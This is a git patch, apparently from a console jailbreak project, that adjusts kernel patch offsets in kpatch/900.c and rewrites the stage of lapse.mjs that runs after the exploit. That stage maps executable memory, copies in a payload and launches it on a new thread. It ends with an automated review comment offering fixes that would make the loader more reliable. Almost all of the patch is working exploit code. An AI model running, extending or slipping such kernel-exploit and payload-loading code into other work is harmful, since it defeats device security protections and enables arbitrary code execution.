From 5137f7bf533943ca62495c45d7703a8b37056268 Mon Sep 17 00:00:00 2001 From: Kameleon <77245601+kmeps4@users.noreply.github.com> Date: Wed, 28 May 2025 17:52:50 -0600 Subject: [PATCH] ABC Fix: the number of blocking requests needed to be 2 --- kpatch/900.c | 5 +++-- kpatch/900.elf | Bin 5288 -> 5288 bytes kpatch/900.o | Bin 1912 -> 1912 bytes lapse.mjs | 45 ++++++++++++++++++++++++++++++++++++++++++--- 4 files changed, 45 insertions(+), 5 deletions(-) diff --git a/kpatch/900.c b/kpatch/900.c index 2ff5a67..b1be105 100644 --- a/kpatch/900.c +++ b/kpatch/900.c @@ -97,9 +97,10 @@ void do_patch(void) { write8(kbase, KERNEL_copyinstr, 0xEB); write8(kbase, KERNEL_copystr, 0xEB); write16(kbase, KERNEL_veriPatch, 0x9090); - write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F); + write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F); + const size_t offset_sysent_11 = 0x1100520; - write32(kbase, offset_sysent_11, 2); + write32(kbase, offset_sysent_11, 6); write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad); write32(kbase, offset_sysent_11 + 0x2c, 1); diff --git a/kpatch/900.elf b/kpatch/900.elf index a38fa6b29ce522f871cba606f666f29f17bcfd66..f33a519136e025829af7f5544e252425491b742f 100644 GIT binary patch delta 14 VcmZ3Xxk7V;svslVW;MYkW&k561OEU3 delta 14 VcmZ3Xxk7V;svslNW;MYkW&k4(1N#5~ diff --git a/kpatch/900.o b/kpatch/900.o index 2e7e5bee06362fc07e6278ec171f0d5185fbb020..47bd1c5bc208aaa93cbdd62ea9014ea71656fbcf 100644 GIT binary patch delta 14 Vcmeyt_k(YPCnF= { +/*kexploit().then(() => { var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, PROT_READ | PROT_WRITE | PROT_EXEC, 0x41000, -1, 0); var payload_loader = new View4(window.pld); chain.sys('mprotect', payload_loader.addr, payload_loader.size, PROT_READ | PROT_WRITE | PROT_EXEC); 
@@ -1760,4 +1760,43 @@ kexploit().then(() => {
 payload_loader.addr,
 payload_buffer,
 );
+})*/
+
+
+kexploit().then(() => {
+ function malloc(sz) {
+ var backing = new Uint8Array(0x10000 + sz);
+ nogc.push(backing);
+ var ptr = mem.readp(mem.addrof(backing).add(0x10));
+ ptr.backing = backing;
+ return ptr;
+ }
+
+ function malloc32(sz) {
+ var backing = new Uint8Array(0x10000 + sz * 4);
+ nogc.push(backing);
+ var ptr = mem.readp(mem.addrof(backing).add(0x10));
+ ptr.backing = new Uint32Array(backing.buffer);
+ return ptr;
+ }
+ window.pld_size = new Int(0x26200000, 0x9);
+
+ var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
+ var payload = window.pld;
+ var bufLen = payload.length * 4
+ var payload_loader = malloc32(bufLen);
+ var loader_writer = payload_loader.backing;
+ for (var i = 0; i < payload.length; i++) {
+ loader_writer[i] = payload[i];
+ }
+ chain.sys('mprotect', payload_loader, bufLen, (0x1 | 0x2 | 0x4));
+ var pthread = malloc(0x10);
+
+ call_nze(
+ 'pthread_create',
+ pthread,
+ 0,
+ payload_loader,
+ payload_buffer,
+ );
 })
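Review bot: The `chain.sys('mprotect', …)` call in the new block discards its return value while the pthread_create call right below it is wrapped in call_nze, so a failed protection change is silently followed by a thread start on that buffer; assuming call_nze raises on a non-zero return as its name suggests, `call_nze('mprotect', payload_loader, bufLen, PROT_READ | PROT_WRITE | PROT_EXEC);` keeps both calls consistent and replaces the magic `(0x1 | 0x2 | 0x4)` (and the bare `7` passed to mmap) with the PROT_* names the old block used. `var bufLen = payload.length * 4` has no terminating semicolon and relies on ASI. malloc32's `sz` is counted in 32-bit elements but is passed bufLen, a byte count, so the backing array is four times larger than needed; `malloc32(payload.length)` matches the helper's unit, and if window.pld is array-like the copy loop can be `loader_writer.set(payload);`. The previous kexploit().then block is only fenced off by the added `})*/` rather than removed, leaving dead code under a block comment whose opening lies outside this hunk.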